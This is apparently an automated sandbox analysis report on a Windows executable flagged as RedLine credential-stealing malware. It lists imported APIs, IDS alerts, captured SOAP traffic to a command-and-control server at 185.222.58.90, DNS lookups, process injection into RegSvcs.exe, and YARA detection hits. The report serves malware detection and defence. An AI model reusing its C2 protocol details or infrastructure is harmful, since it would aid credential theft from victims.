ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                                        USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                                        GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                                        COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                        ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                                        SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                        ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                        OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        EnglishGreat Britain
                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2024-12-24T17:16:52.882997+01002045001ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound1185.222.58.9055615192.168.2.549704TCP
                                                                        2024-12-24T17:17:01.664167+01001800000Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect1192.168.2.549704185.222.58.9055615TCP
                                                                        2024-12-24T17:17:01.664167+01002849662ETPRO MALWARE RedLine - CheckConnect Request1192.168.2.549704185.222.58.9055615TCP
                                                                        2024-12-24T17:17:06.914116+01002045000ET MALWARE RedLine Stealer - CheckConnect Response1185.222.58.9055615192.168.2.549704TCP
                                                                        2024-12-24T17:17:07.226745+01002849351ETPRO MALWARE RedLine - EnvironmentSettings Request1192.168.2.549704185.222.58.9055615TCP
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Dec 24, 2024 17:17:00.220318079 CET4970455615192.168.2.5185.222.58.90
                                                                        Dec 24, 2024 17:17:00.340564966 CET5561549704185.222.58.90192.168.2.5
                                                                        Dec 24, 2024 17:17:00.344433069 CET4970455615192.168.2.5185.222.58.90
                                                                        Dec 24, 2024 17:17:00.361663103 CET4970455615192.168.2.5185.222.58.90
                                                                        Dec 24, 2024 17:17:00.481458902 CET5561549704185.222.58.90192.168.2.5
                                                                        Dec 24, 2024 17:17:00.711252928 CET4970455615192.168.2.5185.222.58.90
                                                                        Dec 24, 2024 17:17:00.831367970 CET5561549704185.222.58.90192.168.2.5
                                                                        Dec 24, 2024 17:17:01.617656946 CET5561549704185.222.58.90192.168.2.5
                                                                        Dec 24, 2024 17:17:01.664166927 CET4970455615192.168.2.5185.222.58.90
                                                                        Dec 24, 2024 17:17:06.794298887 CET4970455615192.168.2.5185.222.58.90
                                                                        Dec 24, 2024 17:17:06.794342995 CET4970455615192.168.2.5185.222.58.90
                                                                        Dec 24, 2024 17:17:06.914115906 CET5561549704185.222.58.90192.168.2.5
                                                                        Dec 24, 2024 17:17:06.914385080 CET5561549704185.222.58.90192.168.2.5
                                                                        Dec 24, 2024 17:17:07.184669018 CET5561549704185.222.58.90192.168.2.5
                                                                        Dec 24, 2024 17:17:07.226744890 CET4970455615192.168.2.5185.222.58.90
                                                                        Dec 24, 2024 17:17:07.286967039 CET5561549704185.222.58.90192.168.2.5
                                                                        Dec 24, 2024 17:17:07.286988020 CET5561549704185.222.58.90192.168.2.5
                                                                        Dec 24, 2024 17:17:07.287003994 CET5561549704185.222.58.90192.168.2.5
                                                                        Dec 24, 2024 17:17:07.287081003 CET5561549704185.222.58.90192.168.2.5
                                                                        Dec 24, 2024 17:17:07.287094116 CET4970455615192.168.2.5185.222.58.90
                                                                        Dec 24, 2024 17:17:07.287096024 CET5561549704185.222.58.90192.168.2.5
                                                                        Dec 24, 2024 17:17:07.287122965 CET4970455615192.168.2.5185.222.58.90
                                                                        Dec 24, 2024 17:17:07.336005926 CET4970455615192.168.2.5185.222.58.90
                                                                        Dec 24, 2024 17:17:07.364341974 CET5561549704185.222.58.90192.168.2.5
                                                                        Dec 24, 2024 17:17:07.364362001 CET5561549704185.222.58.90192.168.2.5
                                                                        Dec 24, 2024 17:17:07.364371061 CET5561549704185.222.58.90192.168.2.5
                                                                        Dec 24, 2024 17:17:07.364476919 CET5561549704185.222.58.90192.168.2.5
                                                                        Dec 24, 2024 17:17:07.364564896 CET4970455615192.168.2.5185.222.58.90
                                                                        Dec 24, 2024 17:17:07.364595890 CET4970455615192.168.2.5185.222.58.90
                                                                        Dec 24, 2024 17:17:09.649188042 CET4970455615192.168.2.5185.222.58.90
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Dec 24, 2024 17:17:07.400832891 CET5201053192.168.2.51.1.1.1
                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Dec 24, 2024 17:17:07.400832891 CET192.168.2.51.1.1.10x3562Standard query (0)api.ip.sbA (IP address)IN (0x0001)false
                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Dec 24, 2024 17:17:07.540652037 CET1.1.1.1192.168.2.50x3562No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                        Dec 24, 2024 17:17:14.499885082 CET1.1.1.1192.168.2.50x4082No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                        Dec 24, 2024 17:17:14.499885082 CET1.1.1.1192.168.2.50x4082No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                        • 185.222.58.90:55615
                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.549704185.222.58.90556153596C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 24, 2024 17:17:00.361663103 CET240OUTPOST / HTTP/1.1
                                                                        Content-Type: text/xml; charset=utf-8
                                                                        SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                        Host: 185.222.58.90:55615
                                                                        Content-Length: 137
                                                                        Expect: 100-continue
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: Keep-Alive
                                                                        Dec 24, 2024 17:17:01.617656946 CET359INHTTP/1.1 200 OK
                                                                        Content-Length: 212
                                                                        Content-Type: text/xml; charset=utf-8
                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                        Date: Tue, 24 Dec 2024 16:17:01 GMT
                                                                        Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                        Dec 24, 2024 17:17:06.794298887 CET223OUTPOST / HTTP/1.1
                                                                        Content-Type: text/xml; charset=utf-8
                                                                        SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                        Host: 185.222.58.90:55615
                                                                        Content-Length: 144
                                                                        Expect: 100-continue
                                                                        Accept-Encoding: gzip, deflate
                                                                        Dec 24, 2024 17:17:07.184669018 CET25INHTTP/1.1 100 Continue
                                                                        Dec 24, 2024 17:17:07.286967039 CET1236INHTTP/1.1 200 OK
                                                                        Content-Length: 10005
                                                                        Content-Type: text/xml; charset=utf-8
                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                        Date: Tue, 24 Dec 2024 16:17:07 GMT
                                                                        Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>45.137.22.172</b:string><b:string>116.30.125.86</b:string><b:string>27.151.156.216</b:string><b:string>223.74.112.220</b:string><b:string>120.85.244.196</b:string><b:string>113.119.26.13</b:string><b:string>125.114.60.149</b:string><b:string>122.239.112.188</b:string><b:string>38.102.188.133</b:string><b:string>183.16.101.185</b:string><b:string>60.179.8.111</b:string><b:string>27.11.95.143</b:string><b:string>113.118.224.149</b:string><b:string>211.90.250.107</b:string><b:string>14.218.27.17</b:string><b:string>14.216.91.87</b:string><b:string>113.119.26.13</b:string><b:string>120.225.98.244 [TRUNCATED]


                                                                        Click to jump to process

                                                                        Click to jump to process

                                                                        Click to dive into process behavior distribution

                                                                        Click to jump to process

                                                                        Target ID:0
                                                                        Start time:11:16:56
                                                                        Start date:24/12/2024
                                                                        Path:C:\Users\user\Desktop\aYf5ibGObB.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\aYf5ibGObB.exe"
                                                                        Imagebase:0xfd0000
                                                                        File size:1'058'816 bytes
                                                                        MD5 hash:8A65E4ACE5821564817C5F343352474C
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2061366016.00000000019F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.2061366016.00000000019F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.2061366016.00000000019F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: infostealer_win_redline_strings, Description: Finds Redline samples based on characteristic strings, Source: 00000000.00000002.2061366016.00000000019F0000.00000004.00001000.00020000.00000000.sdmp, Author: Sekoia.io
                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.2061366016.00000000019F0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:2
                                                                        Start time:11:16:58
                                                                        Start date:24/12/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\aYf5ibGObB.exe"
                                                                        Imagebase:0x2b0000
                                                                        File size:45'984 bytes
                                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2161302470.0000000000382000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.2161302470.0000000000382000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000002.00000002.2161302470.0000000000382000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.2162985561.0000000002706000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:3
                                                                        Start time:11:16:58
                                                                        Start date:24/12/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Reset < >